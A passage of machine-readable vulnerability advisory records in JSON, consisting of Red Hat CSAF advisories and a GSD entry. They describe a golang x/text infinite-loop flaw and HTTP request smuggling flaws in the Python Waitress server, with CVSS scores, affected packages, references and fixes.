listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-14040" }, { "category": "external", "summary": "RHBZ#1853652", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1853652" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-14040", "url": "https://www.cve.org/CVERecord?id=CVE-2020-14040" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040" }, { "category": "external", "summary": "https://github.com/golang/go/issues/39491", "url": "https://github.com/golang/go/issues/39491" }, { "category": "external", "summary": "https://groups.google.com/forum/#!topic/golang-announce/bXVeAmGOqz0", "url": "https://groups.google.com/forum/#!topic/golang-announce/bXVeAmGOqz0" } ], "release_date": "2020-06-17T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash" } ] }
rhsa-2020_0720
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Low" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for python-waitress is now available for Red Hat OpenStack\nPlatform 15 (Stein).\n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Waitress is a pure Python WSGI server which supports HTTP/1.0 and HTTP/1.1.\n\nSecurity Fix(es):\n\n* HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)\n\n* HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)\n\n* HTTP Request Smuggling through Invalid whitespace characters in headers\n(CVE-2019-16789)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2020:0720", "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#low", "url": "https://access.redhat.com/security/updates/classification/#low" }, { "category": "external", "summary": "1789807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807" }, { "category": "external", "summary": "1791415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415" }, { "category": "external", "summary": "1791420", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2020/rhsa-2020_0720.json" } ], "title": "Red Hat Security Advisory: python-waitress security update", "tracking": { "current_release_date": "2024-11-13T22:11:30+00:00", "generator": { "date": "2024-11-13T22:11:30+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.0" } }, "id": "RHSA-2020:0720", "initial_release_date": "2020-03-05T12:02:14+00:00", "revision_history": [ { "date": "2020-03-05T12:02:14+00:00", "number": "1", "summary": "Initial version" }, { "date": "2020-03-05T12:02:14+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-13T22:11:30+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenStack 
Platform 15.0", "product": { "name": "Red Hat OpenStack Platform 15.0", "product_id": "8Base-RHOS-15.0", "product_identification_helper": { "cpe": "cpe:/a:redhat:openstack:15::el8" } } } ], "category": "product_family", "name": "Red Hat OpenStack Platform" }, { "branches": [ { "category": "product_version", "name": "python-waitress-0:1.4.2-1.el8ost.src", "product": { "name": "python-waitress-0:1.4.2-1.el8ost.src", "product_id": "python-waitress-0:1.4.2-1.el8ost.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/python-waitress@1.4.2-1.el8ost?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "python3-waitress-0:1.4.2-1.el8ost.noarch", "product": { "name": "python3-waitress-0:1.4.2-1.el8ost.noarch", "product_id": "python3-waitress-0:1.4.2-1.el8ost.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-waitress@1.4.2-1.el8ost?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "python-waitress-0:1.4.2-1.el8ost.src as a component of Red Hat OpenStack Platform 15.0", "product_id": "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src" }, "product_reference": "python-waitress-0:1.4.2-1.el8ost.src", "relates_to_product_reference": "8Base-RHOS-15.0" }, { "category": "default_component_of", "full_product_name": { "name": "python3-waitress-0:1.4.2-1.el8ost.noarch as a component of Red Hat OpenStack Platform 15.0", "product_id": "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" }, "product_reference": "python3-waitress-0:1.4.2-1.el8ost.noarch", "relates_to_product_reference": "8Base-RHOS-15.0" } ] }, "vulnerabilities": [ { "cve": "CVE-2019-16785", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": 
"2020-01-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1791420" } ], "notes": [ { "category": "description", "text": "An HTTP-request vulnerability was discovered in Waitress which implemented a \"MAY\" part of the RFC7230 which states: \"Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR.\" Unfortunately, if a front-end server does not process header fields with an LF the same way as it processes those with a CRLF, it can lead to the front-end and the back-end server processing the same HTTP message in two different ways. This vulnerability can lead to a potential for HTTP request smuggling and splitting where Waitress may see two requests, while the front-end server only sees a single HTTP message.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP request smuggling through LF vs CRLF handling", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. 
The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16785" }, { "category": "external", "summary": "RHBZ#1791420", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-16785", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16785" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6" } ], "release_date": "2019-12-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2020-03-05T12:02:14+00:00", "details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ], "restart_required": { "category": "none" }, "url": 
"https://access.redhat.com/errata/RHSA-2020:0720" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "version": "3.1" }, "products": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP request smuggling through LF vs CRLF handling" }, { "cve": "CVE-2019-16786", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2020-01-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1791415" } ], "notes": [ { "category": "description", "text": "An HTTP-interpretation flaw was found in waitress which did not properly validate incoming HTTP headers. When parsing the Transfer-Encoding header, waitress would look only for a single string value. According to the HTTP standard, Transfer-Encoding should be a comma-separated list, with the inner-most encoding first, followed by any further transfer codings, ending with \u0027chunked\u0027. Because of this flaw, requests sent with: \"Transfer-Encoding: gzip, chunked\" would get ignored, and waitress would use the Content-Length header instead to determine the body size of the HTTP message. 
A remote attacker could exploit this flaw to force waitress to accept potentially bad HTTP requests or treat a single request as multiple requests in the case of HTTP pipelining.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP request smuggling through invalid Transfer-Encoding", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16786" }, { "category": "external", "summary": "RHBZ#1791415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-16786", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16786" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6" } ], "release_date": 
"2019-12-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2020-03-05T12:02:14+00:00", "details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2020:0720" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "version": "3.1" }, "products": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP request smuggling through invalid Transfer-Encoding" }, { "cve": "CVE-2019-16789", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2019-12-26T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789807" } ], "notes": [ { "category": "description", "text": "An HTTP-interpretation flaw was found in waitress, through version 1.4.0. If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. 
Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server, an HTTP request splitting could occur which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation. The highest threat from this vulnerability is data integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nFor Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16789" }, { "category": "external", "summary": "RHBZ#1789807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807" }, { "category": "external", 
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16789", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16789" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2" } ], "release_date": "2019-12-26T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2020-03-05T12:02:14+00:00", "details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2020:0720" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "version": "3.1" }, "products": [ "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src", "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers" } ] }
gsd-2019-16789
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2019-16789", "description": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.", "id": "GSD-2019-16789", "references": [ "https://www.suse.com/security/cve/CVE-2019-16789.html", "https://access.redhat.com/errata/RHSA-2021:0420", "https://access.redhat.com/errata/RHSA-2020:0720", "https://advisories.mageia.org/CVE-2019-16789.html" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2019-16789" ], "details": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. 
If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.", "id": "GSD-2019-16789", "modified": "2023-12-13T01:23:40.404107Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2019-16789", "STATE": "PUBLIC", "TITLE": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Waitress", "version": { "version_data": [ { "version_affected": "\u003c", "version_name": "\u003c 1.4.1", "version_value": "1.4.1" } ] } } ] }, "vendor_name": "Pylons" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation." 
} ] }, "impact": { "cvss": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)" } ] } ] }, "references": { "reference_data": [ { "name": "FEDORA-2020-bdcc8ffc24", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "name": "FEDORA-2020-65a7744e38", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "name": "RHSA-2020:0720", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes", "refsource": "MISC", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "name": "https://github.com/github/advisory-review/pull/14604", "refsource": "CONFIRM", "url": "https://github.com/github/advisory-review/pull/14604" }, { "name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017", "refsource": "MISC", "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update", "refsource": "MLIST", "url": 
"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" } ] }, "source": { "advisory": "GHSA-m5ff-3wj3-8ph4", "discovery": "UNKNOWN" }, "work_around": [ { "lang": "eng", "value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues." } ] }, "gitlab.com": { "advisories": [ { "affected_range": "\u003c1.4.2", "affected_versions": "All versions before 1.4.2", "cvss_v2": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "cwe_ids": [ "CWE-1035", "CWE-444", "CWE-937" ], "date": "2021-01-08", "description": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. 
This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.", "fixed_versions": [ "1.4.2" ], "identifier": "CVE-2019-16789", "identifiers": [ "GHSA-968f-66r5-5v74", "CVE-2019-16789" ], "not_impacted": "All versions starting from 1.4.2", "package_slug": "pypi/waitress", "pubdate": "2020-01-06", "solution": "Upgrade to version 1.4.2 or above.", "title": "Inconsistent Interpretation of HTTP Requests ", "urls": [ "https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74", "https://nvd.nist.gov/vuln/detail/CVE-2019-16789", "https://github.com/github/advisory-review/pull/14604", "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017", "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/", "https://access.redhat.com/errata/RHSA-2020:0720", "https://github.com/advisories/GHSA-968f-66r5-5v74" ], "uuid": "f19e2471-4474-4572-b0f0-5486495527c9" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:agendaless:waitress:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": 